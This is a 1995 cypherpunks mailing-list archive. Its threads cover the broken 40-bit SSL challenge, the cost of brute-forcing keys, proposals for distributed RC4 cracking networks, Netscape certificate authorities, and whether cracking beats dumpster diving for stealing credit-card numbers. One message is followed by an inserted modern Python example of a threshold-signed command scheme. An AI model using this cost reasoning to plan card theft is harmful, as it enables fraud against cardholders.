And I think your cost estimate is also too high.  You're assuming
$5000 per system, and that's way too high.

You only need a power supply, a motherboard, a processor, a *tiny*
amount of RAM, a network device of some sort (so you can netboot the
systems), and probably a cheezeball display card; you can put one or
two monitors on a cart if you *really* need one hooked up.

You don't need a disk or disk controller -- it's just something else
to break..

Prices selected by throwing darts at the August Computer Shopper.
There are probably lower ones..

	P120 motherboard + processor:	$1099
	P100 motherboard + processor:	  666

	case & power supply:		  $40
	network card (10base2):		  $40

	4MB memory:			 $160
	VGA display card:		  $29
	keyboard:			  $15

So, one could put together a P100 compute server for about $1000, and
a P120 for about $1400.. the P100 is a better deal at this point.

I suspect that with a little work, you could share power supplies
between multiple motherboards, rack-mount the systems, share
keyboards, etc.  You might need a slightly more expensive LAN card for
netbooting...

That cuts your cost estimate down by a factor of about 3 or better, to
around $350.00

I think your electricity estimate may be a bit low, but electricity is
expensive where I live in the northeast U.S...

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMDSrMrT+rHlVUGpxAQEbpAP/TIvDxLjfcdDdqhM5lIG9KEjeIFDWfgMF
qk8RDE1PtAcYrq8SMjgrZ52KU7gf0t0QPs44ZGSC42ff5Z9gRpBGt7f7Qx8GUhPs
6kMVzmkwX9v0XLjcVC9Z/0f7diymWWfFXHW6HHTnYXseoRdmG3MBaDYWkFLiRQSh
ddGscgV48tg=
=ylld
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Fri, 18 Aug 95 08:08:47 PDT
To: harveyrj@vt.edu (R. J. Harvey)
Subject: Re: Netscape security
In-Reply-To: <9508181411.AA11657@toad.com>
Message-ID: <199508181508.LAA11362@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri Aug 18 10:11:07 1995: you scribbled...
> 
> On the subject of Netscape:
>    Now that Netscape is making the Commerce Server available
> for free to students, faculty, libraries, etc. (i.e., groups
> with limited ability to cough-up $290 to RSA to get the 
> 1-year digitally-signed certificate needed to make it operate 
> in "secure mode"), does anyone know of alternative methods for 
> producing such certificates?  

are you sure that this is a commerce server?  Last I saw, it was only the
Communications server (doesn't have SSL).  I could be wrong though.

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 08:15:02 PDT
To: harveyrj@vt.edu (R. J. Harvey)
Subject: Re: Netscape security
In-Reply-To: <9508181411.AA11657@toad.com>
Message-ID: <9508181509.AA01916@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	To clear up some apparent confusion: The Commerce server is
not the certificate.  The NSCP Commerce Server is an httpd.
Non-profits and educationals still need to pay Verisign for a
certificate.  They do not need to pay NSCP for a $5,000 web server.

	The certificates must be signed by an approved key signing
agency.  Anyone can produce one; to get it to interact 'securely' with
free netscape browsers you need the certificate to be signed.

	There is no word as to how to become a KSA.  Netscape has
ignored the question on several occasions.

Adam

| On the subject of Netscape:
|    Now that Netscape is making the Commerce Server available
| for free to students, faculty, libraries, etc. (i.e., groups
| with limited ability to cough-up $290 to RSA to get the 
| 1-year digitally-signed certificate needed to make it operate 
| in "secure mode"), does anyone know of alternative methods for 
| producing such certificates?  


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Fri, 18 Aug 95 08:34:23 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <9508180154.AA02120@euclid.Heuristicrat.COM>
Message-ID: <skB=0EKSMUw880aqY7@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


jordan@Heuristicrat.COM (Jordan Hayes) writes:
> talking to the right people.  Fraud eats away a big chunk of revenue
> and can quite significantly affect competitiveness in a market with
> thin margins.

The credit card market has thin margins?  That's news to me.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harveyrj@vt.edu (R. J. Harvey)
Date: Fri, 18 Aug 95 08:28:23 PDT
To: Alex Tang <altitude@cic.net>
Subject: Re: Netscape security
Message-ID: <9508181528.AA14614@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 AM 8/18/95 -0400, Alex Tang wrote:
>On Fri Aug 18 10:11:07 1995: you scribbled...
>> 
>> On the subject of Netscape:
>>    Now that Netscape is making the Commerce Server available
>> for free to students, faculty, libraries, etc. (i.e., groups
>> with limited ability to cough-up $290 to RSA to get the 
>> 1-year digitally-signed certificate needed to make it operate 
>> in "secure mode"), does anyone know of alternative methods for 
>> producing such certificates?  
>
>Are you sure that this is a commerce server?  Last I saw, it was only the
>Communications server (doesn't have SSL).  I could be wrong though.
>
>...alex...
>
   Yes, I got an email on it this morning.  Check-out:

  http://home.netscape.com/comprod/server_central/index.html.

rj

------------------------------------------------------
R. J. Harvey                 
                            email: harveyrj@vt.edu
WWW site for job analysis 
& personality research:     http://harvey.psyc.vt.edu/

PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 18 Aug 95 11:28:48 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <9508181832.AA21899@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
>Now, I can see calling a MasPar a "parallel supercomputer"; another effort
>at the SSL challenge got the answer about 2 hours before Damien's did,
>and used about 4 days of spare time on the MasPar.  Last time I looked,
>a MasPar was selling for about $150K, though I don't know how big the one
>used on SSL was.  At that price, you could have your own for ~$500/day,
>and ripping off $2000 on a credit card isn't tough in today's automated world.
>Next year - computer time costs half as much.
 
Well, let's put it this way, an MP-2 with 16K processors could attack a 56 bit
key about as fast as a 486 could attack a 40 bit key.   The next generation
MP will be less than an order of magnitude faster, although able to use
more processors.

An MP2 with 1K processors can do 220K crypt(3)/sec.  Now, if it weren't so
darned hard to program one for performance...

One tends to wonder if there are analytical methods to reduce the search
space.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 18 Aug 95 11:35:40 PDT
To: danisch@ira.uka.de
Subject: Re:  Article in Time Magazine
Message-ID: <9508181838.AA22012@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>In the Time Magazine of this week there is an article about a new way
>to make war. Instead of sending bombs, tanks, and soldiers, the
>enemy's computers and communication networks are attacked by sending
>viruses and worms and by using backdoors to sabotage the infrastructure.

I've been getting flyers from the Armed Forces Communications Electronics
Association (AFCEA) for a symposium on information warfare this fall.
Parts are classified SECRET NOFORN.

(SIGNAL magazine is a good source for basic articles, it's the latest rage
in the War Colleges)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Thu, 17 Aug 95 16:46:13 PDT
To: cypherpunks@toad.com
Subject: Re: RC40 and what we still need to do
In-Reply-To: <Pine.ULT.3.91.950817133221.13723B-100000@krypton.mankato.msus.edu>
Message-ID: <199508172345.LAA17758@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am "Robert A. Hayden" and I say ...
> However, I think there is still value in writing the software that will 
> allow cooperation among hundreds or thousands of people.  That way, we 
> could harness the space CPU of machines all over the globe and make the 
> cracking of this kind of stuff routine.
> 
> I'd anticipate with proper advertising, easy-to-use software, and 
> little programming knowledge required, we could easily harness 10,000+ 
> machines and a few dozen parallel machines.

A generalised distributed compute server would be powerful, a
participant would only have to compile the server and ensure it's
running.  It would compile and run cracking code only if signed by say
four principal participants.

The central coordinator service would want to send the following
instructions (every communique would be signed & checked):
	1) accept code & run
	2) report progress
	3) stop
	4) some management of keys, where perhaps any 3 principal
	   participant keys could revoke or add others for
	   evolutionary purposes.

Just an idea, probably old.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
         __________
       .- __   / -- -\  __   .  .  .           0
      / <___> ___  |  =8'                    //\/  
    .^| _---_ /   \ =   / \                 \/\
    |o |  =  / o | |   ||  |              ... /
    =0=======0==|  |----|  |=    Another drive by shooting on
     \_\_/    \_\_/   \_\_/         the information super highway.
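
The signed-command scheme sketched in the message above, as an added example that is not part of the original post or of any list member's code. Assumptions: HMAC-SHA256 tags stand in for the public-key signatures a real deployment would use (so the worker here holds the principals' keys, which a real worker would not), the threshold of one signature for report/stop, the sequence numbers, the floor on revocation and all names are hypothetical.

```python
import hashlib
import hmac
import json

# 4 for code and 3 for key management come from the message; 1 for
# report/stop is an assumption ("every communique would be signed").
THRESHOLDS = {"run": 4, "report": 1, "stop": 1, "add_key": 3, "revoke_key": 3}


def canonical(command):
    """Serialize deterministically so every signer tags the same bytes."""
    return json.dumps(command, sort_keys=True, separators=(",", ":")).encode()


def sign(key, command):
    """Stand-in signature: HMAC-SHA256 over the canonical command."""
    return hmac.new(key, canonical(command), hashlib.sha256).hexdigest()


def make_message(command, keys, signer_names):
    """Bundle a command with one tag per named signer."""
    return {"command": command,
            "signatures": {n: sign(keys[n], command) for n in signer_names}}


class Worker:
    def __init__(self, principals):
        self.principals = dict(principals)  # name -> key bytes
        self.last_seq = 0                   # replay protection (assumption)
        self.job = None                     # SHA-256 of the approved code

    def valid_signers(self, command, signatures):
        """Names of current principals whose tag verifies. Keying the
        result by name means one principal can never count twice."""
        body = canonical(command)
        good = set()
        for name, tag in signatures.items():
            key = self.principals.get(name)
            if key is None:
                continue                    # unknown or revoked signer
            expected = hmac.new(key, body, hashlib.sha256).hexdigest()
            if hmac.compare_digest(expected.encode(), str(tag).encode()):
                good.add(name)
        return good

    def handle(self, message):
        command = message.get("command", {})
        op = command.get("op")
        if not isinstance(op, str) or op not in THRESHOLDS:
            return "rejected: unknown op"
        seq = command.get("seq")
        if not isinstance(seq, int) or seq <= self.last_seq:
            return "rejected: stale or missing sequence number"
        signers = self.valid_signers(command, message.get("signatures", {}))
        if len(signers) < THRESHOLDS[op]:
            return "rejected: %d valid signatures, need %d" % (
                len(signers), THRESHOLDS[op])
        result = self.apply(op, command)
        if not result.startswith("rejected"):
            self.last_seq = seq             # only accepted commands advance
        return result

    def apply(self, op, command):
        if op == "run":
            code = command.get("code")
            if not isinstance(code, str):
                return "rejected: no code"
            # The example records the approved code; it does not execute it.
            self.job = hashlib.sha256(code.encode()).hexdigest()
            return "accepted"
        if op == "report":
            return "progress: job=%s" % self.job
        if op == "stop":
            self.job = None
            return "stopped"
        name = command.get("name")
        if op == "add_key":
            if not isinstance(name, str) or name in self.principals:
                return "rejected: bad or duplicate name"
            try:
                self.principals[name] = bytes.fromhex(command.get("key", ""))
            except (TypeError, ValueError):
                return "rejected: bad key"
            return "added"
        # revoke_key: refuse to shrink the set below the code threshold,
        # otherwise no code could ever be approved again.
        if name not in self.principals:
            return "rejected: unknown principal"
        if len(self.principals) - 1 < THRESHOLDS["run"]:
            return "rejected: too few principals would remain"
        del self.principals[name]
        return "revoked"


if __name__ == "__main__":
    # Constructed sample keys for five principals.
    keys = {n: hashlib.sha256(n.encode()).digest()
            for n in ("p1", "p2", "p3", "p4", "p5")}
    worker = Worker(keys)
    run = {"op": "run", "seq": 1, "code": "print('search block 7')"}
    print(worker.handle(make_message(run, keys, ["p1", "p2", "p3"])))
    print(worker.handle(make_message(run, keys, ["p1", "p2", "p3", "p4"])))
```

A revoked principal's tag is ignored from the next command onward, so a quorum that relied on that key stops being a quorum.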




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Fri, 18 Aug 95 07:48:18 PDT
To: shamrock@netcom.com
Subject: Re: Where is the key cracking farming software?
Message-ID: <199508181448.AA24966@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995 02:11:00 -0400 you wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>With all the talk about cracking SSL, where is the cracking software?
>Somebody just offered me a six Pentium workstation, if I agree to give it a
>"real workout". I'd like to be able to say: "Sure, will do."

There must be several versions of the code at this point.  The
Cypherpunks release, Damien's release and whoever else wrote some code
to do the chore.  If someone could pass me a pointer to the version
that's best-commented and most understandable (one man's C is another
man's crypto) I'd like to port it to Windows NT and write a simple
installation to install it as a service.
	Perhaps a general-purpose OO bruteforcing library (addition to
Crypto++?) would be a good idea.  Just pass pointers to the
encrypt() and decrypt() functions to use for this session to the
Cracker object, which in turn takes a number of bits and starts
cracking.:)
	The problem with this is the disparity among out-of-the-box encrypt
and decrypt functions.  But I suppose it's nothing that couldn't be
overcome with wrapper functions.  Just thinking out loud. :)
						Dan
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 18 Aug 95 09:30:50 PDT
To: Lyle Seaman <lws+@transarc.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <skB=0EKSMUw880aqY7@transarc.com>
Message-ID: <199508181629.MAA02496@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lyle Seaman writes:
> jordan@Heuristicrat.COM (Jordan Hayes) writes:
> > talking to the right people.  Fraud eats away a big chunk of revenue
> > and can quite significantly affect competitiveness in a market with
> > thin margins.
> 
> The credit card market has thin margins?  That's news to me.

It's true. The issuers often end up making most of their money for a
transaction on the fee and not on the two points off the top -- that
money ends up getting divvied up and lots of it disappears into fraud
costs and other similar places. The other big place they make their
money is on the interest they charge people who don't pay off their
balance every month, but for someone like me who does, they are
indeed earning a fairly small margin.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 18 Aug 95 09:36:57 PDT
To: cypherpunks@toad.com
Subject: SSL challenge and escrows
Message-ID: <9508181635.AA23177@all.net>
MIME-Version: 1.0
Content-Type: text


I think a lot of people miss the distinction between automated message
cracking and dumpster diving.  Dumpster diving is not free.  It costs at
least a dollar each to get credit card slips by dumpster diving. 

Consider that in order to use the information, you have to get the slip,
pull off the numbers, enter them into a computer (or even worse yet,
create a phoney card or make a phone call) in order to use the
information.  The break-even point for an automated cracking and usage
system is more than a dollar per stolen card.  My parallel processor
is actually more cost effective for criminal theft via credit card fraud.

What does this have to do with escrow?  My escrow offer costs less than
the cost of criminal attack.  If it reduces attack, it is cost effective
and should lower the overall cost of transaction processing.

In fact, I have a friend who says he will escrow keys for free, but he
is less trustworthy than I am, and I think he wants to get his dollar on
the other side.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: panzer@dhp.com (Panzer Boy)
Date: Fri, 18 Aug 95 10:34:08 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508171031.E16021-0100000@www2.software.net>
Message-ID: <412j0b$6em@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


John Pettitt (jpp@software.net) wrote:
: Huh?  So you run on 120 workstations worth how much?  to steal a credit
: card number worth how much?  Get real - there are hundreds of ways
: to get credit card numbers that cost less.  The idea is to make
: breaking SSL less attractive than dumpster diving not to make it
: impossible.   I'll lay odds that I could get the credit card number
: of *any* individual in the US in less elapsed time and with nothing
: more than a $1000 windoze machine, a telephone and a modem.

I'll ignore the offer to gamble due to agreeing with you.  However, your
comparison to dumpster diving is kinda weak.  People every day use
thousands of dollars worth of computer equipment to download pictures from
select newsgroups.  They have spent a couple grand to be able to download
and view these pictures on their screens.  Now if you told them that they
could just mail order some videos, magazines or the like, they'd tell
you it's "easier" their way. 

Many people have access to piles and piles of computer horsepower.  
People without that will still do dumpster diving, but bored sys-admins, 
college students, college-professors, office workers, etc will still have 
easy access to this type of computing power.

The problem also lies in the fact that people are led to believe that 
their information is safe against most attacks, when it's obvious that 
this information is only safe for a very short time.

Has anyone thought about starting up a distributed rc4 cracking web?  
Send in your message to a web server form, it will then spawn off requests 
to a pool of machines willing to try cracking rc4 for you.  Allow anyone 
to offer up spare cycles towards the effort.

-- 
 -Matt     (panzer@dhp.com)                         DI-1-9026
 "That which can never be enforced should not be prohibited."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 18 Aug 95 10:39:56 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <9508181739.AA21179@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>        There is no word as to how to become a KSA.  Netscape has
>ignored the question on several occasions.

I'm fairly sure that I remember Taher saying at the W3C security
meeting that they intend to do this, and that hardcoding the CA's
into the library was a quick hack.  I also have the impression
that they don't know how to do it, but my recollection is fuzzier there.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 18 Aug 95 11:50:52 PDT
To: Panzer Boy <panzer@dhp.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <412j0b$6em@dhp.com>
Message-ID: <Pine.BSI.3.91.950818134417.12747C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Aug 1995, Panzer Boy wrote:

> John Pettitt (jpp@software.net) wrote:
> : Huh?  So you run on 120 workstations worth how much?  to steal a credit
> : card number worth how much?  Get real - there are hundreds of ways
> : to get credit card numbers that cost less.  
> 
> Has anyone thought about starting up a distributed rc4 cracking web?  
> Send in your message to a web server form, it will then spawn off requests 
> to a pool of machines willing to try cracking rc4 for you.  Allow anyone 
> to offer up spare cycles towards the effort.
> 

I suggested that very thing just yesterday in the list, but my message
seems to have gone awry.  In short, I suggested we use E-Cash payments
for cracking efforts.  This would establish a reward for participating
and an 'exchange rate' for e-cash at the same time.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 18 Aug 95 04:54:32 PDT
To: cypherpunks@toad.com
Subject: Article in Time Magazine
Message-ID: <9508181150.AA03711@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


In the Time Magazine of this week there is an article about a new way
to make war. Instead of sending bombs, tanks, and soldiers, the
enemy's computers and communication networks are attacked by sending
viruses and worms and by using backdoors to sabotage the infrastructure.

How many exported software products might have backdoors,
vulnerabilities, and hidden procedures which are harmful if ever
activated?

Any opinions?

Hadmut 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:50:25 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9508181739.AA21179@sulphur.osf.org>, rsalz@osf.org (Rich Salz) writes:
> >        There is no word as to how to become a KSA.  Netscape has
> >ignored the question on several occasions.
> 
> I'm fairly sure that I remember Taher saying at the W3C security
> meeting that they intend to do this, and that hardcoding the CA's
> into the library was a quick hack.  I also have the impression
> that they don't know how to do it, but my recollection is fuzzier there.

  It has been stated publicly several times that we do plan to allow
user configurable certificate authority and server trust.  A user
will be able to configure their browser to talk to servers that have
certificates signed by any CA they choose to trust.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 18 Aug 95 12:13:17 PDT
To: David Neal <dneal@usis.com>
Subject: Re: SSL challenge -- broken !
Message-ID: <v01510100ac5aa405a6e4@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


David Neal wrote:
>On 18 Aug 1995, Panzer Boy wrote:
>> John Pettitt (jpp@software.net) wrote:
>> : Huh?  So you run on 120 workstations worth how much?  to steal a credit
>> : card number worth how much?  Get real - there are hundreds of ways
>> : to get credit card numbers that cost less.
>>
>> Has anyone thought about starting up a distributed rc4 cracking web?
>> Send in your message to a web server form, it will then spawn off requests
>> to a pool of machines willing to try cracking rc4 for you.  Allow anyone
>> to offer up spare cycles towards the effort.
>>
>
>I suggested that very thing just yesterday in the list, but my message
>seems to have gone awry.  In short, I suggested we use E-Cash payments
>for cracking efforts.  This would establish a reward for participating
>and an 'exchange rate' for e-cash at the same time.

I'd be willing to set up a "crackweb" mailing list, or perhaps a site to
register your machine(s) with % available and MIPS ratings.

DJK






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 11:23:20 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508181629.MAA02496@frankenstein.piermont.com>
Message-ID: <Pine.3.89.9508181449.A623131443-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Perry E. Metzger wrote:
> > The credit card market has thin margins?  That's news to me.
> 
> It's true. The issuers often end up making most of their money for a

Actually the NYT reported this week that banks make super-profits on 
credit cards.  Economists are not sure why the margins are about 3 times 
that of other lines of biz.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 18 Aug 95 14:26:28 PDT
To: Michael Froomkin <cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <ac5a50771d0210045def@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:47 PM 8/18/95, Michael Froomkin wrote:
>I have a question which is of course purely hypothetical.
>
>Suppose you were designing the legal framework that would govern the
>operation of Certification Authorities (the people who issue certificates
>vouching for public keys used for digital signatures), called CAs for
>short.  The CAs will operate in a hierarchical model (not a
>PGP-web-of-trust model), with a state agency being at the root, and
>issuing certificates for private CAs.

I don't see any basis for having a state agency as the root...lots of
things that are grounded in law have no origin/connection to the state.
But, I'll assume your hypothetical (though I think the assumption that
government = root leads down a dangerous path).

>You have decided to allow the private CAs to issue certificates of varying
>degrees of corroboration so long as the degree of verification used is
>deducible from the certificate.  E.g. a certificate might say "we check
>the passport"; or "we check driver's license" or "we took blood, hair,
>fingerprint, retinal scan and first-born child".  It might even say "we
>checked nothing".  You have also decided that a CA may issue a certificate
>in the name of a pseudonym, so long as the CA retains information about
>the True Name.  Now the issue arises as to whether one should allow the CA
>to issue certificates to pseudonyms where it has *no record* of the real
>identity of the person proffering the key pair.

It all depends on what the purpose of certification is in the first place,
and whether alternative hierarchies of certification exist outside the one
that has government as root. For example, I may instantiate many keys for
use in experiments, or as agents in a market microworld, and I may "vouch"
for them.

These "agents" have no True Name, are not persons, but still have varying
levels of certification  (to me, at least)

A company may even have multiple agents. Multiple departments, multiple
users, etc.

The web-of-trust model, which, loosely phrased, says "I say I believe this
is the key of so-and-so, and you can believe me or not. We don't need no
steenking badges!" The beauty of this is that any person or program can
generate lots and lots of keys, for experiments, agents, etc.

Now if it is desired to have the "legal system" mesh with this
certification process, the government is still not needed. Contract law
suffices. If the Alice Corporation claims the Bob Company signed a document
with a fraudulent key (or whatever the scenario might be), then each side
can present in a court what the contracts they agreed to said and what the
facts were.

This happens all the time, though "I am not a lawyer," in disputes about
whether a contract was signed properly, about whether the signer had the
right authority, etc. And it is apparently not necessary to have the
"state" establish itself, for example, as the keeper of signatures.

I concede that there is a path back to the legal "is-a-person" status of
parties, such as credentials for identity.

In cases involving software agents and "virtual persons" (which is where
key certification tends to come in), a stipulation can be made that a Real
Person is to be involved in the loop.


>Is there any reason why a person would want such a certificate?  In other
>words, given that the recipient of a digital signature will easily be
>able to check the value of the certificate (nil), won't the
>transaction/communication be in all ways identical to one where there was
>no certificate at all.  So is anything of value lost by prohibiting such
>a certificate?

So long as I am not prohibited from getting together with others (on a list
like ours, in a corporation, with offshore folks, etc.) and setting up our
own system--of whatever nature--then I suppose it doesn't matter.

But you ask "So is anything of value lost by prohibiting such a certificate?"

Well, why prohibit something unless a real and compelling problem exists?
It might turn out to be very useful to have certificates even for keys that
belong to entities or agents that have no True Name attached to them. I've
given some examples, and can think of more.


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 18 Aug 95 14:37:46 PDT
To: cypherpunks@toad.com
Subject: Economic Model for Key Cracking
Message-ID: <v02120d07ac5ac3256b91@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



So far, list members have mostly presented two points of view on the
economics of key cracking:

  o It's free, since it uses spare CPU cycles
  o It should be priced at the cost of the dedicated computer
    hardware needed to do it.

Both of these approaches are wrong. The first approach fails because
it doesn't scale -- there probably aren't enough people willing to
crack lots of keys purely for the research interest, hack value, or the
goodness of their heart.

At the same time, many people and companies have lots of unused CPU
time on their hands. Economically, this CPU time is scrap material --
and there are companies out there that do nothing but buy up scrap
equipment for pennies on the dollar.

Therefore it should be possible to create a market in spare CPU cycles
for tasks like this that require massive parallel computing. An
earlier suggestion for bounties on keys (basically the Chinese lottery
approach) is a step in this direction.

I'd also like to point out that a hacker who can sniff out SSL-encrypted
packets on a hacked network is going to be vastly harder to catch than
someone who trolls through his or her physical community dumpster diving
and bribing clerks. The ability to anonymously gather and decrypt credit
card numbers has a vastly lower "cost" in terms of likelihood of
prosecution. If it drops down to under $100 per key, it's probably at a
good break-even point to do it wholesale. Certainly the out-of-pocket
cost of cracking a 40-bit SSL key is less than that right now for a
great many people, even without creating a market.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Fri, 18 Aug 95 12:48:24 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks' ideal escrow agent
Message-ID: <Pine.SOL.3.91.950818144033.6796A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've seen the idea of voluntary key escrow discussed before on this list. 
(And no, not the government's idea of "voluntary", either.) A question I 
would raise is this: What would be the ideal setup for an escrow agency? 
If I were to open up an agency for business, what would be some 
characteristics you would look for?


"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 11:48:07 PDT
To: cypherpunks@toad.com
Subject: Certificates/Anonymity/Policy/True Names
Message-ID: <Pine.3.89.9508181423.A623131443-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have a question which is of course purely hypothetical.

Suppose you were designing the legal framework that would govern the 
operation of Certification Authorities (the people who issue certificates 
vouching for public keys used for digital signatures), called CAs for 
short.  The CAs will operate in a hierarchical model (not a 
PGP-web-of-trust model), with a state agency being at the root, and 
issuing certificates for private CAs.

You have decided to allow the private CAs to issue certificates of varying
degrees of corroboration so long as the degree of verification used is
deducible from the certificate.  E.g. a certificate might say "we check
the passport"; or "we check driver's license" or "we took blood, hair,
fingerprint, retinal scan and first-born child".  It might even say "we
checked nothing".  You have also decided that a CA may issue a certificate
in the name of a pseudonym, so long as the CA retains information about
the True Name.  Now the issue arises as to whether one should allow the CA
to issue certificates to pseudonyms where it has *no record* of the real
identity of the person proffering the key pair. 

Is there any reason why a person would want such a certificate?  In other 
words, given that the recipient of a digital signature will easily be 
able to check the value of the certificate (nil), won't the 
transaction/communication be in all ways identical to one where there was 
no certificate at all.  So is anything of value lost by prohibiting such 
a certificate?

I understand, of course, that in a world where the CA has no duty to 
check the client's representations, there is a somewhat farcical element 
to this debate, but this hypothetical problem involves group decision 
making and groups find themselves debating irrational things.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Fri, 18 Aug 95 11:53:55 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Netscape security
In-Reply-To: <199508180750.AAA27087@ix4.ix.netcom.com>
Message-ID: <199508181852.OAA12523@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


